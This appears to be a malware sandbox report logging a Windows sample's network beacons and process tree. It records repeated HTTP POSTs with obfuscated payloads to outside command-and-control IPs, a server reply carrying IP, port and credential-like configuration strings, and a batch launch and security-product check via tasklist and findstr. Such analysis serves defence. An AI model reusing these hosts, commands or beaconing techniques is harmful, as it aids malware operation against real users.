                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.64972146.8.236.61801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:08.756542921 CET297OUTPOST / HTTP/1.1
                                                                          Host: 46.8.236.61
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: H5P4PIXa
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:10.221267939 CET183INHTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:09 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.64972293.185.159.253801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:10.456017017 CET300OUTPOST / HTTP/1.1
                                                                          Host: 93.185.159.253
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: tO0bJBAO
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.64972391.212.166.91801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:10.964260101 CET299OUTPOST / HTTP/1.1
                                                                          Host: 91.212.166.91
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: IjSjQ8Of
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:12.139635086 CET183INHTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:11 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.649724188.130.206.243801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:12.268436909 CET301OUTPOST / HTTP/1.1
                                                                          Host: 188.130.206.243
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: yRvFp1YA
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.64972546.8.232.106802404C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:23.677040100 CET298OUTPOST / HTTP/1.1
                                                                          Host: 46.8.232.106
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: 0hkbIEh2
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:25.363307953 CET183INHTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:25 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.64972646.8.236.61802404C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:25.495266914 CET297OUTPOST / HTTP/1.1
                                                                          Host: 46.8.236.61
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: XN8t83s2
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:26.907893896 CET183INHTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:26 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.64972793.185.159.253802404C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:27.031255007 CET300OUTPOST / HTTP/1.1
                                                                          Host: 93.185.159.253
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: hUf1Jxxo
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.64972891.212.166.91802404C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:37.031603098 CET299OUTPOST / HTTP/1.1
                                                                          Host: 91.212.166.91
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: t6Fn0m7U
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.649729188.130.206.243802404C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:37.274530888 CET301OUTPOST / HTTP/1.1
                                                                          Host: 188.130.206.243
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: 15nJuxzx
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:39.397080898 CET555INHTTP/1.1 200 OK
                                                                          Date: Fri, 29 Nov 2024 15:25:39 GMT
                                                                          Content-Length: 437
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Data Raw: 31 30 39 2e 31 37 32 2e 38 37 2e 31 33 35 3b 32 32 30 31 36 3b 68 41 67 41 74 53 69 72 74 74 6b 45 70 33 78 4e 3a 47 4c 43 2f 77 53 35 2f 67 42 56 34 58 43 63 36 72 6a 57 2e 6d 77 65 38 35 4e 48 2e 7a 54 79 32 62 33 4f 33 6a 4f 69 32 6f 74 41 2e 32 35 74 31 34 44 53 30 5a 65 48 36 59 63 4c 2c 72 41 67 68 63 6f 44 74 45 47 6b 74 6c 6e 54 70 4b 61 70 3a 61 6a 39 2f 37 6b 45 2f 41 42 39 34 39 6d 53 36 48 35 79 2e 4d 52 4b 38 6c 6d 49 2e 46 34 6e 32 35 77 73 33 33 4e 31 36 48 6e 69 2e 49 36 36 36 50 46 61 31 78 54 4b 2c 4f 35 59 68 68 57 38 74 54 62 79 74 72 33 78 70 55 6c 32 3a 6f 75 58 2f 47 46 4f 2f 71 39 32 39 37 35 4e 31 4a 75 69 2e 34 39 53 32 6a 53 4c 31 65 31 44 32 4e 4d 42 2e 58 71 53 31 55 54 4d 36 49 50 34 36 63 70 34 2e 67 6a 33 39 47 34 77 31 44 34 75 2c 68 4a 37 68 7a 35 62 74 46 78 4e 74 69 68 44 70 33 44 48 3a 51 54 38 2f 77 49 34 2f 70 41 41 31 49 63 44 38 72 4f 75 38 78 6b 4e 2e 69 49 7a 31 78 49 65 33 43 54 61 30 44 47 78 2e 45 53 41 32 74 36 59 30 57 51 54 36 38 32 62 2e 47 32 6b 32 [TRUNCATED]
                                                                          Data Ascii: 109.172.87.135;22016;hAgAtSirttkEp3xN:GLC/wS5/gBV4XCc6rjW.mwe85NH.zTy2b3O3jOi2otA.25t14DS0ZeH6YcL,rAghcoDtEGktlnTpKap:aj9/7kE/AB949mS6H5y.MRK8lmI.F4n25ws33N16Hni.I666PFa1xTK,O5YhhW8tTbytr3xpUl2:ouX/GFO/q92975N1Jui.49S2jSL1e1D2NMB.XqS1UTM6IP46cp4.gj39G4w1D4u,hJ7hz5btFxNtihDp3DH:QT8/wI4/pAA1IcD8rOu8xkN.iIz1xIe3CTa0DGx.ESA2t6Y0WQT682b.G2k2Vng4duD3AKA,wZQh7Rlt9fltzXapOte:Ux8/FdR/nSG3M1W8euM.ALe1A0I8T3L0b7Q.ZQU2zU70GZu5orS.AuX1PPJ6yjV4cR0
                                                                          Nov 29, 2024 16:26:09.399477959 CET6OUTData Raw: 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.64973146.8.232.106801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:42.503551960 CET298OUTPOST / HTTP/1.1
                                                                          Host: 46.8.232.106
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: dHf840aa
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:43.858613968 CET183INHTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:43 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.64973246.8.236.61801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:43.992676973 CET297OUTPOST / HTTP/1.1
                                                                          Host: 46.8.236.61
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: 3y3dW444
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:45.635513067 CET183INHTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:45 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.64973393.185.159.253801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:45.761244059 CET300OUTPOST / HTTP/1.1
                                                                          Host: 93.185.159.253
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: DGz9MaA3
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.64973491.212.166.91801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:55.773204088 CET299OUTPOST / HTTP/1.1
                                                                          Host: 91.212.166.91
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: fgwiPh0v
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:57.154066086 CET183INHTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:56 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.649735188.130.206.243801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:57.339792967 CET301OUTPOST / HTTP/1.1
                                                                          Host: 188.130.206.243
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: LagWi7gG
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:10:24:04
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\Desktop\InsertSr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\InsertSr.exe"
                                                                          Imagebase:0x400000
                                                                          File size:45'088'780 bytes
                                                                          MD5 hash:C4C26460F0F0FC5F6ACB5A9DCA7D251C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:10:24:07
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:10:24:07
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:10:24:07
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist
                                                                          Imagebase:0x9f0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:10:24:07
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "wrsa opssvc"
                                                                          Imagebase:0xbc0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist
                                                                          Imagebase:0x9f0000
                                                                          File size:79'360 bytes
